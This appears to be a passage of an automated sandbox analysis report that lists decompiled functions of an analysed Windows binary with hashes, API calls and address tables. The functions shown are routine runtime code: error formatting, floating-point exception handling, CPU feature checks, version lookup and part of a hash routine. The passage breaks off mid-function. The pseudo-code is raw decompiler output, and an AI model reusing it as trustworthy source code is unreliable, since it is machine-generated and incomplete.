                • GetLastError.KERNEL32(003D6DDF,00000000,00000400), ref: 003D6C74
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 003D6C95
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 8706e587f2b489c075fe9a3c4ae9b9b21a09960fc036b9417417523bdfea3fdb
                • Instruction ID: 77191b280499da0ffe89810af545f4844b38c573b8a77bbbde5bf4c1ae539a0e
                • Opcode Fuzzy Hash: 8706e587f2b489c075fe9a3c4ae9b9b21a09960fc036b9417417523bdfea3fdb
                • Instruction Fuzzy Hash: 19D0C932385300BFFA120F619E07F2A7F9DBF45B56F18C415B7A5E90E0CA749424A629
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004019F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E004019F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E003FF352(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E003FF2B8(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                0x00401a02
                0x00401a09
                0x00401a0e
                0x00401a14
                0x00401a17
                0x00401a1d
                0x00401a22
                0x00401a27
                0x00401a27
                0x00401a2d
                0x00401a32
                0x00401a37
                0x00401a37
                0x00401a3e
                0x00401a43
                0x00401a48
                0x00401a48
                0x00401a4f
                0x00401a54
                0x00401a59
                0x00401a59
                0x00401a60
                0x00401a65
                0x00401a6a
                0x00401a6a
                0x00401a72
                0x00401a82
                0x00401a94
                0x00401aa6
                0x00401ab9
                0x00401acb
                0x00401ad3
                0x00401ad8
                0x00401add
                0x00401add
                0x00401ae4
                0x00401ae9
                0x00401ae9
                0x00401af0
                0x00401af5
                0x00401af5
                0x00401afc
                0x00401b01
                0x00401b01
                0x00401b08
                0x00401b0d
                0x00401b0d
                0x00401b17
                0x00401b19
                0x00401b53
                0x00401b1b
                0x00401b20
                0x00401b44
                0x00401b4c
                0x00401b40
                0x00401b40
                0x00401b56
                0x00401b5d
                0x00401b5f
                0x00401b81
                0x00401b89
                0x00401b8c
                0x00401b8c
                0x00401b8e
                0x00401b8e
                0x00401b99
                0x00401b9f
                0x00401ba4
                0x00401bab
                0x00401be5
                0x00401bf0
                0x00401bf6
                0x00401bf9
                0x00401bfc
                0x00401c08
                0x00401c10
                0x00401bad
                0x00401bb0
                0x00401bbc
                0x00401bc2
                0x00401bc8
                0x00401bcb
                0x00401bd4
                0x00401bd4
                0x00401c13
                0x00401c21
                0x00401c27
                0x00401c2e
                0x00401c30
                0x00401c30
                0x00401c37
                0x00401c39
                0x00401c39
                0x00401c40
                0x00401c42
                0x00401c42
                0x00401c49
                0x00401c4b
                0x00401c4b
                0x00401c52
                0x00401c54
                0x00401c54
                0x00401c61
                0x00401c64
                0x00401c9b
                0x00401c66
                0x00401c66
                0x00401c69
                0x00401c94
                0x00401c89
                0x00401c89
                0x00401c9d
                0x00401ca5
                0x00401ca8
                0x00401cc7
                0x00401ccc
                0x00401ccc
                0x00401cce
                0x00401cd3
                0x00401cdf
                0x00401cd5
                0x00401cd8
                0x00401cd8
                0x00401ce4
                0x00401ce4
                0x00401caa
                0x00401cad
                0x00401cbc
                0x00000000
                0x00401cbc
                0x00401caf
                0x00401cb2
                0x00401cb4
                0x00401cb4
                0x00000000
                0x00401cb2
                0x00401c6b
                0x00401c6e
                0x00401c84
                0x00000000
                0x00401c84
                0x00401c73
                0x00401c75
                0x00401c75
                0x00401c73
                0x00000000
                0x00401c64
                0x00401b66
                0x00401b74
                0x00401b7c
                0x00000000
                0x00401b7c
                0x00401b6a
                0x00401b6f
                0x00401b6f
                0x00000000
                0x00401b6a
                0x00401b27
                0x00401b35
                0x00401b3d
                0x00000000
                0x00401b3d
                0x00401b2b
                0x00401b30
                0x00401b30
                0x00401b2b

                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004019EF,?,?,00000008,?,?,0040168F,00000000), ref: 00401C21
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 2e90e538f93babccff5632c8345fbba9dd9e06e0ee43ad294cbcd5de9a16e334
                • Instruction ID: 58e215a93b5425a6fa69384bec7ef421f7593cb0c8bd455516af5cd1725b93f5
                • Opcode Fuzzy Hash: 2e90e538f93babccff5632c8345fbba9dd9e06e0ee43ad294cbcd5de9a16e334
                • Instruction Fuzzy Hash: 11B13B352106089FE715CF28C48AB657BE0FF45364F258669E89ADF3E1C339E992CB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E003EF654(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0x431d20 =  *0x431d20 & 0x00000000;
				 *0x40e7a0 =  *0x40e7a0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x431d24;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x431d24 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x40e7a0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x431d20 = 1;
					 *0x40e7a0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x431d20 = 2;
						 *0x40e7a0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x40e7a0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x431d20 = 3;
								 *0x40e7a0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x431d20 = 5;
									 *0x40e7a0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x40e7a0 =  *0x40e7a0 | 0x00000040;
										 *0x431d20 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0x431d24 | 0x00000001;
					 *0x431d24 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}





























                0x003ef654
                0x003ef657
                0x003ef661
                0x003ef672
                0x003ef824
                0x003ef827
                0x003ef827
                0x003ef678
                0x003ef67e
                0x003ef683
                0x003ef687
                0x003ef68b
                0x003ef68d
                0x003ef68f
                0x003ef692
                0x003ef697
                0x003ef6a0
                0x003ef6b1
                0x003ef6bc
                0x003ef6c2
                0x003ef6c3
                0x003ef6c9
                0x003ef6cc
                0x003ef6d6
                0x003ef6d9
                0x003ef6dc
                0x003ef6df
                0x003ef724
                0x003ef724
                0x003ef72a
                0x003ef72a
                0x003ef72f
                0x003ef730
                0x003ef736
                0x003ef768
                0x003ef738
                0x003ef73a
                0x003ef73b
                0x003ef741
                0x003ef744
                0x003ef746
                0x003ef749
                0x003ef74c
                0x003ef74f
                0x003ef752
                0x003ef75b
                0x003ef760
                0x003ef760
                0x003ef75b
                0x003ef76b
                0x003ef770
                0x003ef773
                0x003ef77d
                0x003ef788
                0x003ef78e
                0x003ef791
                0x003ef79b
                0x003ef7a6
                0x003ef7b2
                0x003ef7b5
                0x003ef7b8
                0x003ef7c3
                0x003ef7c8
                0x003ef7ca
                0x003ef7cf
                0x003ef7d2
                0x003ef7dc
                0x003ef7e4
                0x003ef7e9
                0x003ef7f3
                0x003ef801
                0x003ef814
                0x003ef81b
                0x003ef81b
                0x003ef801
                0x003ef7e4
                0x003ef7c8
                0x003ef7a6
                0x00000000
                0x003ef823
                0x003ef6e4
                0x003ef6ee
                0x003ef719
                0x003ef71c
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003EF66A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: 261726037aed3a08b8db42120a2b6cc37c225ced35f51869fc4b278444b987ef
                • Instruction ID: d297c08469350fc14253dd0c197a85e6d38ebd472d2d6d284b3acb14ab9de70e
                • Opcode Fuzzy Hash: 261726037aed3a08b8db42120a2b6cc37c225ced35f51869fc4b278444b987ef
                • Instruction Fuzzy Hash: 455192B1A006598FEB15CF56E9817AABBF4FB48354F258A39D401EB2A0D3B4E901CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DB146() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x40e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x4110a8;
					_t13 =  *0x4110ac;
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x40e020 = _t12;
					 *0x4110a8 = _t6;
					 *0x4110ac = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                0x003db149
                0x003db158
                0x003db196
                0x003db19b
                0x003db15a
                0x003db160
                0x003db16b
                0x003db171
                0x003db177
                0x003db17d
                0x003db183
                0x003db189
                0x003db18e
                0x003db18e
                0x003db1a4
                0x003db1b3
                0x003db1a6
                0x003db1ac
                0x003db1ac

                APIs
                • GetVersionExW.KERNEL32(?), ref: 003DB16B
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: ad36e2d0fde60ba2fa25c1ce9460d93accd6c6b977cedfefb5132c82f4e6c088
                • Instruction ID: 13beac119f0f667f30dde84ed6ca9e3bbf0bb279a3bd03d0d72b0d1a0dc7618d
                • Opcode Fuzzy Hash: ad36e2d0fde60ba2fa25c1ce9460d93accd6c6b977cedfefb5132c82f4e6c088
                • Instruction Fuzzy Hash: 16F030B5D00218CFDB18CB18FD916D977F5F748315F1146AAD619937A0C370AA818E64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 76%
                			E003D40FE() {
				signed int* _t187;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t216;
				signed int _t217;
				signed int _t224;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t239;
				signed int _t240;
				signed int _t245;
				signed int _t246;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				signed int _t286;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int _t299;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t310;
				void* _t311;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				intOrPtr _t329;
				signed int _t331;
				signed int _t332;
				intOrPtr _t335;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				signed int _t344;
				signed int _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr _t349;
				intOrPtr _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				intOrPtr _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;

				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
				_t187 =  *(_t295 + 0xf8);
				_t258 =  *_t187 ^ 0x510e527f;
				_t352 = _t187[1] ^ 0x9b05688c;
				_t266 = 0x10;
				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
				_t363 = _t362 + 0xc;
				_push(8);
				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
				_t364 = _t363 + 0xc;
				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
				_t272 =  *(_t364 + 0x6c);
				_t335 = 0;
				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
				 *(_t364 + 0x38) =  *(_t364 + 0x74);
				 *(_t364 + 0x18) = 0x6a09e667;
				 *(_t364 + 0x24) = 0xbb67ae85;
				 *(_t364 + 0x2c) = 0x3c6ef372;
				 *(_t364 + 0x34) = 0xa54ff53a;
				 *((intOrPtr*)(_t364 + 0x14)) = 0;
				 *(_t364 + 0x30) =  *(_t364 + 0x70);
				 *(_t364 + 0x10) = _t272;
				do {
					_t27 = _t335 + 0x4036c0; // 0x3020100
					_t31 = _t364 + 0x18; // 0x6a09e667
					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
					_t297 = _t320 ^ _t258;
					_t259 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t274 =  *_t31 + _t297;
					_t337 = _t274 ^  *(_t364 + 0x10);
					asm("ror esi, 0xc");
					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c1) & 0x000000ff) * 4)) + _t337 + _t320;
					 *(_t364 + 0x18) = _t200;
					_t201 = _t200 ^ _t297;
					asm("ror eax, 0x8");
					 *(_t364 + 0x3c) = _t201;
					_t202 = _t201 + _t274;
					 *(_t364 + 0x48) = _t202;
					asm("ror eax, 0x7");
					 *(_t364 + 0x50) = _t202 ^ _t337;
					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
					_t299 = _t323 ^ _t352;
					_t353 =  *(_t364 + 0x38);
					asm("rol edx, 0x10");
					_t276 =  *(_t364 + 0x24) + _t299;
					_t339 = _t276 ^  *(_t364 + 0x30);
					asm("ror esi, 0xc");
					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c3) & 0x000000ff) * 4)) + _t339 + _t323;
					 *(_t364 + 0x10) = _t208;
					_t209 = _t208 ^ _t299;
					asm("ror eax, 0x8");
					 *(_t364 + 0x44) = _t209;
					_t210 = _t209 + _t276;
					 *(_t364 + 0x58) = _t210;
					asm("ror eax, 0x7");
					 *(_t364 + 0x24) = _t210 ^ _t339;
					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
					_t301 = _t342 ^  *(_t364 + 0x20);
					asm("rol edx, 0x10");
					_t278 =  *(_t364 + 0x2c) + _t301;
					_t354 = _t353 ^ _t278;
					asm("ror ebp, 0xc");
					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0x4036c5) & 0x000000ff) * 4)) + _t354 + _t342;
					 *(_t364 + 0x40) = _t216;
					_t217 = _t216 ^ _t301;
					asm("ror eax, 0x8");
					 *(_t364 + 0x54) = _t217;
					_t260 = _t217 + _t278;
					_t355 =  *((intOrPtr*)(_t364 + 0x14));
					asm("ror eax, 0x7");
					 *(_t364 + 0x20) = _t260 ^ _t354;
					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0x4036c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
					_t303 = _t326 ^  *(_t364 + 0x28);
					asm("rol edx, 0x10");
					_t280 =  *(_t364 + 0x34) + _t303;
					_t344 = _t280 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0x4036c7) & 0x000000ff) * 4)) + _t344 + _t326;
					 *(_t364 + 0x4c) = _t224;
					_t328 = _t224 ^ _t303;
					asm("ror edi, 0x8");
					_t356 = _t328 + _t280;
					asm("ror eax, 0x7");
					 *(_t364 + 0x1c) = _t356 ^ _t344;
					_t98 = _t364 + 0x18; // 0x6a09e667
					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0x4036c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
					_t305 = _t283 ^ _t328;
					_t329 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t345 = _t305 + _t260;
					_t262 = _t345 ^  *(_t364 + 0x24);
					asm("ror ebx, 0xc");
					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036c9) & 0x000000ff) * 4)) + _t262 + _t283;
					 *(_t364 + 0x5c) = _t232;
					_t233 = _t232 ^ _t305;
					asm("ror eax, 0x8");
					 *(_t364 + 0x28) = _t233;
					 *(_t364 + 0x98) = _t233;
					_t234 = _t233 + _t345;
					_t263 = _t262 ^ _t234;
					 *(_t364 + 0x2c) = _t234;
					 *(_t364 + 0x84) = _t234;
					asm("ror ebx, 0x7");
					 *(_t364 + 0x30) = _t263;
					 *(_t364 + 0x70) = _t263;
					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
					_t265 = _t286 ^  *(_t364 + 0x3c);
					asm("rol ebx, 0x10");
					_t306 = _t265 + _t356;
					_t358 = _t306 ^  *(_t364 + 0x20);
					asm("ror ebp, 0xc");
					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036cb) & 0x000000ff) * 4)) + _t358 + _t286;
					_t258 = _t265 ^ _t239;
					 *(_t364 + 0x60) = _t239;
					asm("ror ebx, 0x8");
					_t240 = _t306 + _t258;
					_t359 = _t358 ^ _t240;
					 *(_t364 + 0x34) = _t240;
					 *(_t364 + 0x88) = _t240;
					asm("ror ebp, 0x7");
					 *(_t364 + 0x38) = _t359;
					 *(_t364 + 0x74) = _t359;
